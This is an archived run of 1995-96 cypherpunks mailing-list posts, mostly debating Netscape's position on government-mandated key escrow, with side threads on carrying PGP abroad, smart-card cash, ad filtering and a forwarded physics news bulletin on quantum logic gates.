Let's also consider the granting institution, a second-rank school.

Cohen's thesis broke new ground, but how many people have read it, or any of
his writings, or know anything about his ideas beyond a single word?  How far
did he carry this work?  Where are the conference and journal papers?  Cohen's
reputation faded into obscurity long ago.  Now he is building a new reputation
as a pig-headed loudmouth, threatening his "defamers."  Shades of Sternlight.

DEADBEAT <na5877@anon.penet.fi>

-----BEGIN PGP SIGNATURE-----
Version: 2.4

iQBFAgUBMOa9TPFZTpBW/B35AQFLQQGAmzB8o+g5k3mYmzMmk3JiDTBf+P8dSFZY
25IwVISjSV7o95vgbmNWAy/3zVY50AKn
=SfU6
-----END PGP SIGNATURE-----
--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pyro Teknik" <pyro-teknik@mail.geocities.com>
Date: Thu, 5 Dec 1996 09:36:55 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Travelling With Laptops/PGP
Message-ID: <199612051730.JAA17379@geocities.com>
MIME-Version: 1.0
Content-Type: text/plain


> Problem:
> 
> I will be spending a couple of months chilling out in Barcelona, Spain.
> I will have a local Internet account/dial-up in that city, and will use 
> it to telnet into my various US-based accounts. This is how I plan to 
> keep in touch with various people while I am gone.
> 
> Questions:
> 
> 1 - Is the importation of two laptops and it's various peripheral devices 
> by a US citizen into Spain going to be a problem? I know it is in some 
> European countries.
> 
> 2 - Will having PGP 2.6.2, with 2048-bit keys, or any key length for this 
> matter, installed on these two machines, cause a problem?
> 
> Would this be a viable workaround? Or should I just say fuck it, and just 
> disavow myself of any reason/need for PGP for the duration of my stay? If 
> this is gonna be a problem, I'll just forego anything requiring 
> encryption while I am in Spain.

I walked straight through British, Dutch and Maltese Customs at the 
respective airports and they didn't even ask what was in the bag, let 
alone what software. I had PGP and a huge keyring stored on my hard 
drive and they were known the wiser.

> I have no interest in smuggling crypto in, or defying international law 
> just to use PGP for personal use. If it's not allowed, I simply won't use 
> it. But, I MUST be able to bring my laptops into the country. That HAS to 
> happen.

I'd suggest to lugging them through as hand luggage. If you are 
worred, zip up pgp and so on with a password - if customs do check, 
they aren't gonna waste breaking the zip password (even though it can 
be done quickly)

Also, I think the law may different, as you are an American Citizen 
using your own equipment...


 
[*]-------------------------------------------[*]----------------[*]
[*] Pyro Teknik - <pyro-teknik@geocities.com> [*]   Linux Guru   [*]
[*] www.geocities.com/SunsetStrip/Alley/7705/ [*] Phone Phreaker [*]
[*]-------------------------------------------[*]----------------[*]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ljo@ausys.se (Johansson Lars)
Date: Fri, 1 Dec 95 03:48:51 PST
To: fletch@ain.bls.com
Subject: Re: VisaCash security.
Message-ID: <95Dec1.124621gmt+0100.53761@void.ausys.se>
MIME-Version: 1.0
Content-Type: text/plain




<fletch@ain.bls.com> wrote:

>        I think the Visa stuff is basically stored value and
>rechargeable smart cards, not really ecash type money.  Supposedly
>you'll be able to get a card with $10 or $20 on it and all the
>vending machines and phones around the Olympic venues will be set
>up to take the cards.  So to answer your questions, no it's not really
>digital cash (like ecash); and yes I think it's probably traceable
>to some extent (unless you buy stored value cards w/paper cash).
>
>        First Union, the bank selling the cards, has a page on them:
>
>http://www.firstunion.com/visacash/
>
>        Low on the technical info, but they give an address to mail
>questions to.

A couple of weeks ago I was giving a talk at a conferance on
computer technology in financial applications in Stockholm.
I mentioned VISA:s electronic purse 'Smart Cash' in my talk
and during the break afterwards a representative from a danish
bank told me that VISA:s 'Smart Cash' was actually bought from
the danish purse/project 'Danmont'. Does anyone know the truth
of this, please let me know.

Regards,
/Lars Johansson
ljo@ausys.se





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JR@ROCK.CNB.UAM.ES
Date: Fri, 1 Dec 95 03:59:20 PST
To: cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
Message-ID: <951201140557.20a03b98@ROCK.CNB.UAM.ES>
MIME-Version: 1.0
Content-Type: text/plain


From:	SMTP%"tcmay@got.net"  1-DEC-1995 12:26:55.99

>With the assumption that this is not a troll, and giving the writer some

	No, it isn't.

>At 10:45 AM 12/1/95, JR@ns.cnb.uam.es wrote:
>>With regard to all this waving about Netscape giving in to key scrow...
>
>Key _escrow_, though "scrow" is perhaps just as accurate as the
>improperly-named "key escrow" (hint: escrow is something done voluntarily,
>not the situation here with GAK).
>
	Yup. I should have said "mandatory key scrow". Sorry for using a
shorthand.

>Having said this, I think all of the shareholders, either of issued shares
>or as-yet-unissued shares, are interested in maximizing share value. Not
>surprising.

	That's the point. They look after *their* interests, not after
"public" interest, specially where "public" is a local (as big as local
to US may be) interest in a global economy.

>Importantly--and maybe this is the real point JR is making--we on the
>Cypherpunks list are probably *not* interested in Netscape's stock price.
>But who cares? Our role is not to maximize Netscape stock price, but to
>talk about what is "right" and what is not right. And GAK is definitely not
>right, to the vast majority of us.

	Right. What I wanted to say was exactly that.

>They were "criticized" not because they went public with their stock but
>because of their security mistakes, made more important by their sudden

	The point is not why they were chased but the fact they were. It
reflects on further reticences by crypto-interested people to get involved
and opens more field to crypto-unaware or uninterested people to gain
control of the company.

...
>Well, this is the point, isn't it? I doubt there are such things as "tax
>reliefs" for Netscape--these things are done pretty much out in the open in
>the U.S., and any special tax treatment would be widely noticed--but there
>may indeed have been "discussions" with senior management at Netscape.
>Several of us have already speculated in broad terms on this.

	Well, I don't know about what kind of compensation could be
offered. Tax reliefs was just a suggestion. What about saying "hey
guys, if you comply with our demands we'll set Netscape as the standard
browser for the administration. If you don't you won't sell a copy".
In any case, the point is that a Government (anY) can make strong pressure,
specially one as big as USA's Gov. And facing it is a risky position.

...

>First, a viable strategy is to simply do nothing. Ignore the goverment's
>protestations, drag one's feet, shrug, etc. Jim Clark could simply have
>said nothing. (Recall that Bill Gates came out recently saying that strong
>encryption is inevitable...Clark could have either said nothing, or said
>something similar to what Gates said.)

	That may be a very bad move from their point of view. If the Gov.
pushes hard, and it is an important customer, it is in their interest
to satisfy them. As long as anyone else wants to follow the Gov. it is
also good for them to follow those lines, and to be the firsts ones.

	What about foreign customers? If the Gov. can restrict export of
your technologies, they'll move to other providers. It is better for
you to pay hommage to the Gov. requests and get to overseas markets
faster and sooner than anyone else.

>Second, the issue is not "satisfying" a "bunch of cypherpunks." If Netscape
>truly pushes for GAK, and people reject GAK and Netscape, then this will
>surely hurt shareholder value. (Frankly, I expect one or more stories to
>appear in the next few days about the budding "Friends Don't Let Friends
>Use Netscape" and "Just Say No to Netscape" movements. Whether this will
>hurt the stock is unclear.)

	The "just say no" movement is OK as long as you don't append
"to XXX". It could work if it is only Netscape... But as soon as anyone
else gives in (e.g. Microsoft) it will become a burden. It's much better
IMHO to ask "say yes to privacy". It's much better to say "this page is
optimized for good safety and may not be reliable under non-crypto
browsers -e.g. Netscape-" than saying "your browser is bad". Which
BTW, may be OK in the USA, but is not in other places. Belgium comes
to mind for forbidding negative advertising. And surely others. 

...
>I say that the ideas being discussed are in fact "constructive" ideas.  I
>won't reiterate them all here, but they clearly involve concrete action
>(e.g., modifying server software to issue warnings to Netscape users, or
>encouragement of alternatives to Netscape).

	Some of them are. Others are not. Others are destructive (like
denying access to Netscape users), or unpracticable (like saying "Mozilla
is not the best thing" in some places), or unrealistic (like saying "quit
your job"), or plain silly.

	If you deny access to a user, you'll make him/her angry. And not
angry with Netscape. They'll be angry with you. We need people on our
side. That's basic psicology. I'd go for more pages explaining what
crypto is and can do for Joe Random.

	Many people has said "I can do this or that with my server or
whatever". How many people is offering an alternate safe crypto service 
and making it interesting and desirable for Joe Random? And making it 
well known? I'd say that not enough. 

	If you can offer an attractive service, protected with another
crypto method, and make it popular, people will demand it. If you just
add a note saying you use that crypto 'cos Government-enforced crypto is
not good enough, people will feel happy and will learn.

	In general, people prefers positive presentations to complains
or problems. Have a look at TV ads. How many of them say "Don't use
that stuff, it's shit" instead of "Use my stuff, it's better".

	That's what I advocate: a positive course of action, offering
a better alternative. Not just a storm of complains or "bad karma".

>What more are you expecting? Have you been reading what people are actually
>discussing doing and actually already doing?
>
	Yes, I've read all along. As I hope will be more clear now. And
I have found lots of people saying "I won't support Netscape", "I will
say no", "I will deny access to Netscape", "I'll add a complain to my
page", "Jim should retract", "Netscape should go back", "Netscape better
changes its money-making policy and becomes a political activist", 
"This or that guy must quit job"...

	What I was expecting is people to be more realistic, not to forget
that the main goal of a company is to make money instead of defending public
freedom (which indeed is bad for business), and start promoting better (or
not) alternatives.

	And, to finish, note that I have also seen some very good answers,
on which I don't coment since I agree and have little to add to.

>--Tim May
>
				jr





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Fri, 1 Dec 95 18:54:52 PST
To: cypherpunks@toad.com
Subject: Re: Netscape, Corporations, and GAK Support
Message-ID: <199512020254.TAA04583@mailhost1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


I know I may be asking for this a second time,

But just what is James Clark's E-Mail Address?

Thanks!
Happy Holidays!

Carol Anne

--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joe Thomas <jthomas@access.digex.net>
Date: Fri, 1 Dec 95 23:17:29 PST
To: Anonymous <nobody@REPLAY.COM>
Subject: Re: A "Warning Banner" for Netscape Navigator? Good idea!
In-Reply-To: <199512020326.EAA25501@utopia.hacktic.nl>
Message-ID: <Pine.SUN.3.91.951202021203.28980B-100000@access4.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 2 Dec 1995, Wilhelm Busch wrote:

> >Oh, I don't have their home page enabled. What I meant, but perhaps wasn't
> >clear about in my post, is that the commercials pop up in Yahoo, Infoseek,
> >Deja News, Excite, and so forth. (OK, so it is inaccurate to say "Netscape"
> >puts them in.)

> A while back, someone on comp.infosystems.www.* posted patches to CERN httpd
>  allowing the proxy server to filter out url's based on regexp matching.
> Thus you could update a regexp file as new ads appeared.

I think the author, Axel Boldt, posted this URL to cypherpunks a while 
back...

From http://emile.math.ucsb.edu:8000/~boldt/NoShit/index.html :

Filtering the Web using WebFilter

This document describes the WebFilter (formerly known as NoShit) extension 
to Cern's httpd web server which allows you to filter out annoying parts 
of web pages that you visit often. 

Why to use WebFilter

You have probably noticed how many popular web sites that offer cool 
stuff sooner or later inevitably turn to advertising. They are very 
welcome to do that, of course, except if they try to place their shit on 
my computer screen.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 1 Dec 95 19:26:09 PST
To: cypherpunks@toad.com
Subject: Re: A "Warning Banner" for Netscape Navigator? Good idea!Re: A "Warning Banner" for Netscape Navigator? Good idea!
Message-ID: <199512020326.EAA25501@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

tcmay@got.net (Timothy C. May) wrote:
>Oh, I don't have their home page enabled. What I meant, but perhaps wasn't
>clear about in my post, is that the commercials pop up in Yahoo, Infoseek,
>Deja News, Excite, and so forth. (OK, so it is inaccurate to say "Netscape"
>puts them in.)
>
>Some of the ads are intertwined with the command boxes of the particular
>service, and thus may be hard to excise, but others seem to be separate.
>
>Any ideas?
>
>--Tim May

A while back, someone on comp.infosystems.www.* posted patches to CERN httpd
 allowing the proxy server to filter out url's based on regexp matching.
Thus you could update a regexp file as new ads appeared.

It should be fairly easy to implement something similar under Netscape 2.x
using plug-ins. Anyone interested in collaborating?

Wilhelm Busch

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBML/FZIiUi5SQtQ3tAQHeAAgAmtp2fF9/UzHpDIz0pOXQqZ/0U+1/vMjR
jenuLn17jkgQQXAl6e617ZKMJ4h+vV8QBOh78CPaK7omV9oJyNfDRQweDBWtiFRl
uEzyeUoYwGoXxkUH5ANM8AW3GaBSiQ4TCDnwZlAsJ1pYYGRgJhMtdEwPnNVAXW+l
l0uODlH+ENi8hGwsM683j7gGws0cc4JcH7Ou2U9zmLZ2gHrdQsWWdw70PjhdlK7e
26aY7EGfI9pTH69mHKV60Qxj2FmSCt1v6MeHjUwRupajCNTGcnsw3FllvRJc7lug
cYPApS2ychZSszUwBqoBMvJpAUSpWk+x/RfQTDeo0wsCSvwc66mhWA==
=DnEr
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimbell@pacifier.com (jim bell)
Date: Sat, 2 Dec 95 10:41:02 PST
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: "Got a subpoena?"
Message-ID: <m0tLwij-00090FC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


>On Thu, 30 Nov 1995, sameer wrote:
>
>> > 
>> > What about a court order to (a) start comprehensive logging, and (b) not
>> > tell anyone under penalty of ______ .
>
>I am unaware of any authority for such an order.
>> 
>> 	Aren't court orders part of the public record? I don't quite
>
>Yes, but court orders can be sealed pending further order of the court.

Okay, maybe with your qualifications you can answer this.  It has always
mystified me why "the authorities" think they can engage in wiretapping
without informing the person wiretapped that this has occurred, despite the
fact that there was apparently never any precedent for this practice before
the "wiretap era."

In addition, I would like to be able to figure out a method to allow the
de-facto disclosure of such activities, and to in fact force the phone
company to do so, if they are asked to tap my or anyone else's phone.  It
occurred to me that even if there was a prohibition on explicitly revealing
that such a tap exists, it should be possible to require the telephone
company to certify that no tap exists, and to require that this
certification will be followed by an explicit and immediate de-certification
message the moment the phone company is unable to maintain such
certification.  The receipt of such a letter/fax/email will indicate that a
tap has been placed, despite the fact that it will not say so.


>EBD
>
>Not a lawyer on the Net, although I play one in real life.
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 3 Dec 95 13:14:45 PST
To: sameer <nowhere@bsu-cs.bsu.edu (Anonymous)
Subject: Re: your mail
Message-ID: <199512032115.NAA20213@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


>At 11:32 PM 12/2/95 -0800, sameer wrote:
>	I hate to repeat myself, but sometimes people don't listen.
>http://www.c2.org/apachessl/
>


This Web page fails to explain what Apache-SSL actually is, what it is good
for, 
and why people should use it.

Looks like the page was constructed by the same marketing experts as 
Central Point Software employed before it went under.



 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 3 Dec 95 13:41:19 PST
To: cypherpunks@toad.com
Subject: Re: Do the Right Thing
Message-ID: <199512032141.NAA05386@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:22 PM 12/3/95 -0800, Timothy C. May wrote:
>Netscape, being the dominant browser company, and Microsoft, being the
>dominant OS company, are in special positions to "build in Big Brother."

Bill Gates, after some ducking, weaving, and equivocating, has said
that GAK is a violation of our right to privacy.

Jim Clark has said that GAK is the government benevolently protecting
our privacy.

I hope to see a "clarification" of Clark's position soon, and I am
far from happy with the "clarification" provided by Jeff.

> Netscape is becoming the yellow corn of the Web, and an obvious
> "choke point" for the NSA and its sisters to mandate crypto policies.
> Hence, the role of non-yellow-corn alternatives...)

I recommend Mosaic, much improved in its latest release, and, unlike
Netscape, standards compliant.


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sat, 2 Dec 95 15:41:56 PST
To: "Dr. Frederick B. Cohen" <fc@all.net>
Subject: Re: Info on Netscape's key escrow position
In-Reply-To: <9512021318.AA27932@all.net>
Message-ID: <30C0E317.71DC@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Dr. Frederick B. Cohen wrote:
> 
> >   I had lunch with Jim Clark today, and explained the furor that was
> > currently going on in cypherpunks and elsewhere.  After lunch he sent
> > me the e-mail that I've attached below to pass along.  I think the gist
> > of it is that if governments require key escrow, we will have to do it
> > in order to sell our products with encryption into those countries.
> 
> The point Netscape seems to miss is that by refusing to go with weak
> crypto and having the best product on the market, Netscape may be able
> to force these governments into a position of accepting it.
> 
> Suppose Netscape took the position that it was 512 bit RSA, and that it
> was for sale to anyone who wanted to buy it? The result would either be
> a billion dollars of market impact and a collapse of the high-tech stock
> bubble we are now building, or the government backing down.

  This is exactly what the government wants.  Some of the largest
software companies have been producing software that only supports
short key lengths for both export and domestic use for years, and
it has not caused the government to back down.  

> If the US government backed down, and Netscape became the best product
> around and maintained that lead for a long time, other countries would
> either have to allow Netscape in, or suffer the consequences of falling
> behind in the IT curve.

  Many customers in other countries want our US version.  They are pushing
on their governments and the US government to get it.  This is already
happening.

	--Jeff
  
-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sat, 2 Dec 95 16:11:23 PST
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Info on Netscape's key escrow position
In-Reply-To: <01HYCC2KMZJ48WZ6BG@mbcl.rutgers.edu>
Message-ID: <30C0E933.851@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


E. ALLEN SMITH wrote:
>         I believe that the central question at hand is whether Netscape will
> incorporate mandatory GAK into any of its products if you have an economic
> (governmental purchase) rather than physical (governmental threat of violence)
> reason to do so. I would hope that the upcoming statement will clarify this
> position, and in the proper direction.
>         -Allen

  If the government wants to purchase software for its own use that implements
key escrow, why it that bad?  The whole point of our anti-GAK position is that
government mandated key escrow is bad.  If individuals, companies, or government
agencies want to escrow their own keys, with the escrow agents of their own
choosing, I have not problem.  Its only when the government make the escrow
and the agent mandatory that I've got a problem.

  I don't believe that Netscape will ship a product that mandates GAK
unless it was required by law to do so.  As long as it is legal to sell
non-escrowed crypto products in this country or elsewhere, I think we
will keep doing it, because that is what our customers want.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sat, 2 Dec 95 16:13:06 PST
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: Info on Netscape's key escrow position
In-Reply-To: <199512021603.IAA00950@blob.best.net>
Message-ID: <30C0EA69.4806@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


James A. Donald wrote:
> 
> At 11:01 PM 12/1/95 -0800, Jeff Weinstein wrote:
> >
> >  I think the gist
> > of it is that if governments require key escrow, we will have to do it
> > in order to sell our products with encryption into those countries.
> 
> Jim Clark wrote:
> >> But if we do not come up with a solution to this problem that is
> >> acceptable to each government, we will not be able to export our products,
> >> except with a short key length (e.g. 40 bit keys), and that will not be
> >> acceptable to corporate customers in other countries.
> 
> I read it as saying:  "Let us help the government invade the privacy
> of our customers, so that the government will do us some favors in export
> licensing", rather than "Well if they stick it to us at gunpoint,
> we will submit."

  After talking with Jim over lunch, I believe that the second interpretation
is more accurate, and is certainly true of the companies position at this
point.  Also keep in mind that Jim's comments are his own opinion, and do
not necessarily represent the position of the company.  Barksdale's law is
that we provide value to our customers.  Our customers want long keys an
no GAK, both within and outside the country.  As long as we are legally
allowed to do that, I think we will.  The fact that customers know the
dangers of 40-bit keys, and that it is the government that is forcing
them to use weak keys, is in large part due to the brute force cracks
of the cypherpunks.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sat, 2 Dec 95 16:29:09 PST
To: Black Unicorn <unicorn@polaris.mindport.net>
Subject: Re: GAK Flap Happening at a Good Time--Journalists Read!
In-Reply-To: <Pine.SUN.3.91.951202140203.1199A-100000@polaris.mindport.net>
Message-ID: <30C0EE0D.48A9@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn wrote:
> 
> On Sat, 2 Dec 1995, Jeff Weinstein wrote:
> 
> > Black Unicorn wrote:
> > >
> > > On Fri, 1 Dec 1995, Jeff Weinstein wrote:
> 
> > > >   See my recent message to this list.  We will be taking an anti-GAK
> > > > position.
> > >
> > > So you will refuse to implement GAK in future version of netscape then?
> > > Or you will merely do lipservice to the GAK policies at the conference?
> > >
> > > I think the distinction is quite key.
> >
> >   If the law requires GAK, then I believe that we will implement it rather
> > than just disable encryption.  We are taking a position against GAK and
> > will continue to lobby against it.  We are planning to continue to do both
> > US and Export versions, so I don't think that the government's ploy of
> > trying to lure companies into weakening their domestic versions will work.
> 
> AT&T seems to have been suitably 'incentivized'
> The receipt of government funding (in whatever guise) might be just as
> powerful in this case.
> 
> To the outsider, it looks as if Netscape 'owes' the government.

  We do owe the government.  They have paid us for Servers and Clients
that support Fortezza.  That is what we owe them.  The money that the
NSA gave us for Fortezza is not very significant compared to what we
are getting from commercial sources.

> > We released a 128-bit version of our product almost a year ago, at a
> > time when many companies were providing only weak crypto in their domestic
> > products so that they didn't have to trouble themselves with two versions.
> 
> And this is impressive.  Stamina, however, is much more difficult.
> 
> > We are actively lobbying in washington to get clarification of the
> > current regulations so that we can provide the US version via an "export
> > controlled" FTP or HTTP download.
> 
> With which firm?  Or have you made it an in-house effort?

  We have recently hired a government liason person to manage our policy
discussions with the government.  He is one of the people that will be
talking to congressional and white house representatives next week.
I don't know if we have made use of any outside lobbying firms.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sat, 2 Dec 95 16:36:08 PST
To: sameer <sameer@c2.org>
Subject: Re: GAK Flap Happening at a Good Time--Journalists Read!
In-Reply-To: <199512021936.LAA09776@infinity.c2.org>
Message-ID: <30C0EF90.132D@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


sameer wrote:
> 
> >
> > With which firm?  Or have you made it an in-house effort?
> >
> 
>         There was no Netscape (or RSADSI, for that matter [an RSADSI
> employee showed up, but it was on his own time]) representative at the
> recent Bernstein hearing in SF. I think that shows how much they
> really care.

  How would having an official representative from Netscape in
the audience have influenced the outcome of the proceedings?  I would
have liked to attend, but was in the process of trying to get
a beta release out at the time.  Do you honestly believe that the
only people who want Bernstein to win are those who were present
in the court room that day?  Not even Dan himself was there.
Does that mean that he doesn't care about the outcome of the case?

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sat, 2 Dec 95 15:01:11 PST
To: cypherpunks@toad.com
Subject: update.250 (fwd)
Message-ID: <199512022305.RAA05770@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


Forwarded message:
From physnews@aip.org Fri Dec  1 18:18:29 1995
Date: Fri, 1 Dec 95 14:44:34 EST
From: physnews@aip.org (AIP listserver)
Message-Id: <9512011944.AA12171@aip.org>
To: physnews-mailing@aip.org
Subject: update.250


PHYSICS NEWS UPDATE                         
The American Institute of Physics Bulletin of Physics News
Number 250 December 1, 1995       by Phillip F. Schewe and Ben
Stein

TWO-BIT QUANTUM LOGIC GATES have been experimentally
demonstrated for the first time.  Analogous to conventional electronic
logic gates in personal computers but different in that they follow the
strange rules of quantum mechanics, a quantum logic gate, in its
simplest form, consists of two "qubits."  Each qubit is a quantum
system (for example an atom or a photon) having two states
corresponding to the 0 and 1 of a conventional gate.  Unlike an
ordinary digital bit, a qubit can be in a combination or
"superposition" of 0 and 1, offering the potential for unique kinds of
calculations.  A NIST team (Chris Monroe, 303-497-7415) uses a
single trapped beryllium ion to demonstrate a two-bit quantum logic
gate.  One bit, the control bit, is specified by the (quantized) external
vibrations of the ion in the atom trap; the two lowest vibrational
levels correspond to values 0 and 1.  The other bit (the target bit) is
specified by an internal state of one of the ion's electrons; it has a
"spin-down" state (0) and a "spin-up" state (1). Shooting laser pulses
at the single ion causes it to act as a two-bit "controlled NOT" gate.
If the control bit is 0 then the target bit is left alone.  If the control
bit is 1 then the target bit flips its spin.  Meanwhile, a Caltech group
(Quentin Turchette, 818-395-8343) has demonstrated the feasibility of
using a pair of electromagnetic fields (each representing a single
photon or less) as a two-bit quantum gate.  When the two fields
interact with an atomic beam in between a narrow cavity, the first
field, having one of two orientations, or "polarizations," can control
the phase of the second field; switching the polarization prevents the
first field from controlling the phase. Finally, in a paper submitted to
Physical Review Letters, a team at the Ecole Normale Superieure
(Serge Haroche, haroche@physique.ens.fr) reports a quantum logic
gate in which a two-level electromagnetic field in a cavity changes the
energy level of a Rydberg atom (an atom in a highly excited state) in
the cavity.  All groups are currently attempting to string together
multiple gates, but this remains a major challenge.  Performing the
powerful calculations envisioned with quantum computers would
probably require thousands of gates, but Haroche warns that systems
of quantum gates are likely to become "decoherent," or lose their
quantum properties, beyond several tens or hundreds of gates.  While
practical "quantum computers" might be difficult to realize with
present concepts, physicists believe these two-bit experiments may
pay off by opening possibilities for practical schemes of quantum
teleportation and quantum cryptography and by bringing new insights
into, as Haroche puts it, "the fuzzy boundary between the classical
and quantum worlds."  (C. Monroe et al. and Q. A. Turchette et al.,
two upcoming articles in Physical Review Letters, tentatively Dec.
11; journalists should contact AIP Public Information at
physnews@aip.org)

EVIDENCE FOR COSMIC RAYS COMING FROM A
SUPERNOVA has finally been observed.  The standard opinion about
cosmic rays is that the lower-energy rays (up to an energy of 10**15
eV) probably originate in our galaxy and consist of electrons and ions
accelerated to high speeds by supernova shocks.  (Higher-energy
cosmic rays may be extragalactic in origin.)  New pictures of
supernova SN1006 recorded by the orbiting ASCA x-ray telescope
reveal both thermal x rays---the radiation coming from supernova
remnant material at high temperature---and non-thermal x rays from
the limb of the supernova---synchrotron radiation from high energy
electrons (100 TeV), presumably energized by the outward-moving
shock front from the supernova.  The ASCA scientists expect that
ions too are being accelerated by the same mechanism.  (K. Koyama
et al., Nature, 16 November.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Sat, 2 Dec 95 16:09:49 PST
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: Info on Netscape's key escrow position
In-Reply-To: <30C0E317.71DC@netscape.com>
Message-ID: <199512030009.SAA00717@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


>   Many customers in other countries want our US version.  They are pushing
> on their governments and the US government to get it.  This is already
> happening.

Couldn't you set up a company in the Netherlands or some such place that 
allowed you to export to the rest of the world?

There could be a US version of Netscape, produced here in the States, and
a strong international version produced by a different company, using non
crypto technology licensed from Netscape and a crypto engine produced
entirely offshore.  You could make the offshore firm virtually worthless
by forcing them to give all the money to Netscape proper in the form of
licensing fees.  It wouldn't matter who owned it, so you could give the
franchise to a Dutch national without giving away the store.

I seem to remember US companies getting around restrictions on doing
business with South Africa using a similar strategy. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu>
Date: Sat, 2 Dec 95 15:56:39 PST
To: jsw@netscape.com
Subject: Re: Info on Netscape's key escrow position
Message-ID: <01HYCC2KMZJ48WZ6BG@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"jsw@netscape.com"  "Jeff Weinstein"  2-DEC-1995 02:26:13.63

  I had lunch with Jim Clark today, and explained the furor that was
currently going on in cypherpunks and elsewhere.  After lunch he sent
me the e-mail that I've attached below to pass along.  I think the gist
of it is that if governments require key escrow, we will have to do it
in order to sell our products with encryption into those countries.

> If we as a company were to take the position that in no case will we allow
> a government to get access to our encrypted messages, or refuse to allow
> key escrow with our products, the governments of the world will quickly put
> us out of business by outlawing the sale of our products in their countries.
> The fundamental issue is how do we accommodate the requirements of
> governments, while protecting our rights as citizens.
> 
> None of this represents the position of Netscape with respect to what we
> will do. But if we do not come up with a solution to this problem that is
> acceptable to each government, we will not be able to export our products,
